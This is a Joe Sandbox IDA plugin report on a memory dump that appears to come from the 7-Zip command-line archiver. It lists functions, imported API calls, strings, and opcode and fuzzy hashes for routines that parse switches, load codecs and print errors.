Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$FreeString$fputcfree
String ID: = $--$----$Path$Type$Warning: The archive is open with offset
API String ID: 2701146716-1919703766
Opcode ID: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
Instruction ID: 6bc815c0465cb8888c230135113aaea6677290f740a622c02de41a9f5cad5383
Opcode Fuzzy Hash: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
Instruction Fuzzy Hash: 1B919136224A8592DB10EF22E9547AE73B1F7A9BC4F405122EF5E47B18DF38C9A5C700

Function 001DF71C Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D1610: free.MSVCRT ref: 001D1682
Part of subcall function 001D1610: free.MSVCRT ref: 001D168A
Part of subcall function 001D1610: free.MSVCRT ref: 001D16C4

_CxxThrowException.MSVCRT ref: 001DF76E
_isatty.MSVCRT ref: 001DF77E
_isatty.MSVCRT ref: 001DF796
_isatty.MSVCRT ref: 001DF7AE
_CxxThrowException.MSVCRT ref: 001DF8E0
wcscmp.MSVCRT ref: 001DF96F
_CxxThrowException.MSVCRT ref: 001DF9AE
_CxxThrowException.MSVCRT ref: 001DFA6F
GetCurrentProcess.KERNEL32 ref: 001DFA77
SetProcessAffinityMask.KERNEL32 ref: 001DFA83
free.MSVCRT ref: 001DFA8F

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 001DF92A
SeRestorePrivilege, xrefs: 001DF91C
Unsupported switch postfix -stm, xrefs: 001DFA52
Unsupported switch postfix for -slp, xrefs: 001DF991
SeLockMemoryPrivilege, xrefs: 001DF9CB
Unsupported switch postfix -bb, xrefs: 001DF8C3

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
API String ID: 1961088698-2328792591
Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
Instruction ID: 1553a6db96295eeb07151e60d1bbc8d65bdf3a7e4cc7feaae971f55fd89ebf01
Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
Instruction Fuzzy Hash: ABA1AF73A08AC4D9DB11DF25D4903AC3B60E7A5B94F98807BDB9D47726CF28CA86C710

Function 0021A448 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 0021A477

Part of subcall function 001D26A0: fputs.MSVCRT ref: 001D26C1

fputs.MSVCRT ref: 0021A4C1
free.MSVCRT ref: 0021A52B
free.MSVCRT ref: 0021A533
free.MSVCRT ref: 0021A545
free.MSVCRT ref: 0021A57A
free.MSVCRT ref: 0021A582
free.MSVCRT ref: 0021A594
_CxxThrowException.MSVCRT ref: 0021A5E1
free.MSVCRT ref: 0021A5EF
free.MSVCRT ref: 0021A61C
free.MSVCRT ref: 0021A62E

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

Strings

Warnings: , xrefs: 0021A470
Errors: , xrefs: 0021A4BA

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$fputs$ExceptionThrowfputc
String ID: Errors: $Warnings:
API String ID: 437615013-2345102087
Opcode ID: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
Instruction ID: 1749c53fc767a83c65e72ac021fe62122c6ba98f2e39f52f12cabfe829107142
Opcode Fuzzy Hash: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
Instruction Fuzzy Hash: C35194627295C191C930EF25E9913EEA3A2F7B5790F484123DAAD17759CF3CC8D68701

Function 001F83C8 Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D8624: free.MSVCRT ref: 001D86A9

free.MSVCRT ref: 001F8493
free.MSVCRT ref: 001F84A7
free.MSVCRT ref: 001F84B8
free.MSVCRT ref: 001F8503
free.MSVCRT ref: 001F850E

Part of subcall function 001D86DC: free.MSVCRT ref: 001D8761

free.MSVCRT ref: 001F854D
free.MSVCRT ref: 001F8558
free.MSVCRT ref: 001F8590
free.MSVCRT ref: 001F859B

Part of subcall function 001F8290: free.MSVCRT ref: 001F832B
Part of subcall function 001F8290: free.MSVCRT ref: 001F8336

free.MSVCRT ref: 001F85D0
free.MSVCRT ref: 001F85DB
free.MSVCRT ref: 001F85EA
free.MSVCRT ref: 001F8602

Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339

Strings

Path, xrefs: 001F856A, 001F85AA
Codecs, xrefs: 001F841F
7z.dll, xrefs: 001F83F0
Path64, xrefs: 001F84D6, 001F8520
Formats, xrefs: 001F844E

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove
String ID: 7z.dll$Codecs$Formats$Path$Path64
API String ID: 1534225298-3804457719
Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
Instruction ID: ddd78be3578440a62591ce33acebbbe18c5c34dc2f10b0e7a344325920609f76
Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
Instruction Fuzzy Hash: 1B51646220564591DE20EF15E8513A9A730E7E67E4F885223FB6E577B9CF3CC68AC700

Function 001FAB74 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 001FABC9
free.MSVCRT ref: 001FACF3
free.MSVCRT ref: 001FACFE
free.MSVCRT ref: 001FAD95
memmove.MSVCRT(?), ref: 001FADCB
free.MSVCRT ref: 001FAE70
free.MSVCRT ref: 001FAF7F

Part of subcall function 001F94A8: free.MSVCRT ref: 001F94DB
Part of subcall function 001F94A8: free.MSVCRT ref: 001F94E3
Part of subcall function 001F94A8: free.MSVCRT ref: 001F94F0
Part of subcall function 001F94A8: free.MSVCRT ref: 001F951C
Part of subcall function 001F94A8: free.MSVCRT ref: 001F9525
Part of subcall function 001F94A8: free.MSVCRT ref: 001F952D
Part of subcall function 001F94A8: free.MSVCRT ref: 001F953A

free.MSVCRT ref: 001FAEC2

Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2

Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAA95
Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAAC5
Part of subcall function 001FA9FC: free.MSVCRT ref: 001FAAD2

free.MSVCRT ref: 001FAEFA
GetProcAddress.KERNEL32 ref: 001FAF4D

Strings

Formats\, xrefs: 001FAED1
7z.dll, xrefs: 001FAE3C, 001FAE89
SetCodecs, xrefs: 001FAF43
Codecs\, xrefs: 001FAE99

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove$AddressProc
String ID: 7z.dll$Codecs\$Formats\$SetCodecs
API String ID: 4053071709-2499791885
Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
Instruction ID: 0a74a9f7efce6ecc611a7d0b199900673d635266ebc9c907ee8bde1ad2a9e5ca
Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
Instruction Fuzzy Hash: 43B1D2B6214AC596CB20EB21E4903BFB760F795788F944112EB9E47B25CF7CC969C702

Function 00211850 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00211877
fputs.MSVCRT ref: 0021190A
LeaveCriticalSection.KERNEL32 ref: 00211A44

Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232

fputs.MSVCRT ref: 0021194D

Part of subcall function 001D26A0: fputs.MSVCRT ref: 001D26C1

fputs.MSVCRT ref: 002119CB
fputs.MSVCRT ref: 002119EA
LeaveCriticalSection.KERNEL32 ref: 00211A51

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

free.MSVCRT ref: 00211A14

Strings

ERROR: , xrefs: 002119C4
p, xrefs: 002119A4
Sub items Errors: , xrefs: 00211946
Can't allocate required memory!, xrefs: 002119E3
Everything is Ok, xrefs: 00211903

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
API String ID: 676172275-580504279
Opcode ID: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
Instruction ID: 99deb694bd137d918c71f4d9372974fbc6e2c9a64000abb8f3a2ae840808e86d
Opcode Fuzzy Hash: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
Instruction Fuzzy Hash: 85514A72315A82A2EB19AF25DAA43E96360FB64B90F445126DF7E07750CF38D4B4C300

Function 001F38E8 Relevance: 22.8, APIs: 13, Strings: 2, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001F373C: free.MSVCRT ref: 001F37FB

memmove.MSVCRT ref: 001F396F
free.MSVCRT ref: 001F3986
free.MSVCRT ref: 001F3A11
_CxxThrowException.MSVCRT ref: 001F3A5F
free.MSVCRT ref: 001F3AD3

Part of subcall function 001F3864: free.MSVCRT ref: 001F3877
Part of subcall function 001F3864: free.MSVCRT ref: 001F3892
Part of subcall function 001F3864: free.MSVCRT ref: 001F389B
Part of subcall function 001F3864: free.MSVCRT ref: 001F38C6
Part of subcall function 001F3864: free.MSVCRT ref: 001F38CE

Strings

Duplicate archive path:, xrefs: 001F3C07
Cannot find archive, xrefs: 001F3A42

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmemmove
String ID: Cannot find archive$Duplicate archive path:
API String ID: 3934437811-2067063536
Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
Instruction ID: 95f29508aeb1440f2ac8d4e2cb07efb40470c6de58321bca18d42618076501a8
Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
Instruction Fuzzy Hash: 9CA19472315B8992CA20EB16E89056EB3A1F7D5BD0F444512EFAE47B29DF3CC946CB10

Function 002042A2 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.MSVCRT ref: 00204324
free.MSVCRT ref: 0020441A
free.MSVCRT ref: 00204425

Strings

, xrefs: 00204466

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-3916222277
Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
Instruction ID: e4caf81a62f5baefe01874c72bb2ccfdabb6dcf2c438b8fb22e6de8d417598b8
Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
Instruction Fuzzy Hash: 78D14C77219BC596CB21EF25E0902AEBB60F7D6B44F444016DB8E43B6ADF78C599CB00

Function 001F91E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 001F9205
GetProcAddress.KERNEL32 ref: 001F9219
GetProcAddress.KERNEL32 ref: 001F922D
GetProcAddress.KERNEL32 ref: 001F9257
memmove.MSVCRT ref: 001F92F0
GetProcAddress.KERNEL32 ref: 001F931C

Strings

CreateDecoder, xrefs: 001F91FB
CreateEncoder, xrefs: 001F920E
GetHashers, xrefs: 001F9315
GetMethodProperty, xrefs: 001F9222
GetNumberOfMethods, xrefs: 001F9245

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: AddressProc$memmove
String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
API String ID: 2879976980-73314117
Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
Instruction ID: d41164f6901a15b9d47b16047dabb4719439d1bb873d4b4fe85aac0bed874479
Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
Instruction Fuzzy Hash: 83414976619A49D6DB20EF25F8843ADB3A1F794784F801526EB8E83764DF78C949CB00

Function 00211BC0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00211CF9

Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

fputs.MSVCRT ref: 00211DEE
fputs.MSVCRT ref: 00211F07
fputs.MSVCRT ref: 00211F5C

Part of subcall function 0021171C: fputs.MSVCRT ref: 00211744
Part of subcall function 0021171C: fputs.MSVCRT ref: 00211758
Part of subcall function 0021171C: free.MSVCRT ref: 0021176B

Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698

Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4

free.MSVCRT ref: 00211F86

Strings

ERROR: , xrefs: 00211F00
Can't allocate required memory, xrefs: 00211F55
ERRORS:, xrefs: 00211CBF, 00211CF2
WARNINGS:, xrefs: 00211DB4, 00211DE7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$free$FormatFreeLocalMessagefputcmemset
String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
API String ID: 2553544393-24972044
Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
Instruction ID: d0e2a900e82c48e4eee3318789cb7c3d55b09e2001befda4f1ba6547f21dade6
Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
Instruction Fuzzy Hash: D0A14A66314A85AACA29EF62E5903ED7361F778B80F484126DB6E47B11DF78D8F4C301

Function 0021949B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 002194EE
_CxxThrowException.MSVCRT ref: 0021A5E1
free.MSVCRT ref: 0021A5EF
free.MSVCRT ref: 0021A61C
free.MSVCRT ref: 0021A62E
free.MSVCRT ref: 0021A696
free.MSVCRT ref: 0021A69E
free.MSVCRT ref: 0021A6B0

Strings

Decoding ERROR, xrefs: 002194E7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrowfputs
String ID: Decoding ERROR
API String ID: 117389134-2585761706
Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
Instruction ID: 3afbe86ff6e7f55b9def4c825bfb6ac025dd39c8b1c763a28866a94a08519832
Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
Instruction Fuzzy Hash: F731D46272A9C191CE30EF25E8803EDA3A1F7A1780F485523CA5E57758DF78C9E5CB01

Function 001FA7FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001D6464: FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

GetProcAddress.KERNEL32 ref: 001FA8CA
GetProcAddress.KERNEL32 ref: 001FA8E8
GetProcAddress.KERNEL32 ref: 001FA908
free.MSVCRT ref: 001FA985
free.MSVCRT ref: 001FA996

Strings

SetLargePageMode, xrefs: 001FA8BF
CreateObject, xrefs: 001FA8FD
SetCaseSensitive, xrefs: 001FA8DD

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: AddressProcfree$FreeLibrarymemmove
String ID: CreateObject$SetCaseSensitive$SetLargePageMode
API String ID: 852969883-606380122
Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
Instruction ID: fa7c6282c5213fb597d70c05909f71d7393056aa8ea27c052c80c4ae695ee8d5
Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
Instruction Fuzzy Hash: AC41C076200B449ADB20EF26E85036E6360FB94B98F888525DF9E47765EF7CD886C340

Function 0021B480 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 229stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 0021B723
fputs.MSVCRT ref: 0021B743

Part of subcall function 001D38C8: memmove.MSVCRT(001DA0E5), ref: 001D3907

Part of subcall function 001D3A64: memmove.MSVCRT ref: 001D3AAA

GetTickCount.KERNEL32 ref: 0021B49E

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

strcmp.MSVCRT ref: 0021B4E3
wcscmp.MSVCRT ref: 0021B502
strcmp.MSVCRT ref: 0021B568

Strings

. , xrefs: 0021B6AC

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: memmovestrcmp$CountTickfputsfreewcscmp
String ID: .
API String ID: 591578422-4150638102
Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
Instruction ID: ce55cc9901e852bd6a0ac1ba4abec7abe8754cc89bd1f3db64fcd82c77dfb143
Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
Instruction Fuzzy Hash: 8AA14B77710A85ABCB2ADF2AD69029DB3B1F764784F808016DB5A47B11DF34E8B6C700

Function 00212ECC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00212F7E
fputs.MSVCRT ref: 00212F9D
free.MSVCRT ref: 00212FB6
free.MSVCRT ref: 00212FC1

Part of subcall function 001D2C78: free.MSVCRT ref: 001D2CAE

Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4

free.MSVCRT ref: 00212FCC

Strings

= , xrefs: 00212F96
h<", xrefs: 00212F2E

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$fputs
String ID: = $h<"
API String ID: 2444650769-3841148799
Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
Instruction ID: 295eeb5d81bfb5351f5b9fe55a2aafd9d4ee533c4e4d5367ee488c9d68888d99
Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
Instruction Fuzzy Hash: 7D215162224940D5CA20EF25E4912AEA770EBF57D0F445223FF6E47B69DF38C99AC700

Function 001F9D98 Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C11
Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C19
Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C3B

Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9D2A

wcscmp.MSVCRT ref: 001F9E66
free.MSVCRT ref: 001F9ECA
free.MSVCRT ref: 001F9ED4
free.MSVCRT ref: 001F9F13
free.MSVCRT ref: 001F9F1B
free.MSVCRT ref: 001F9F28
free.MSVCRT ref: 001F9F49
free.MSVCRT ref: 001F9F51

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmovewcscmp
String ID:
API String ID: 3584677832-0
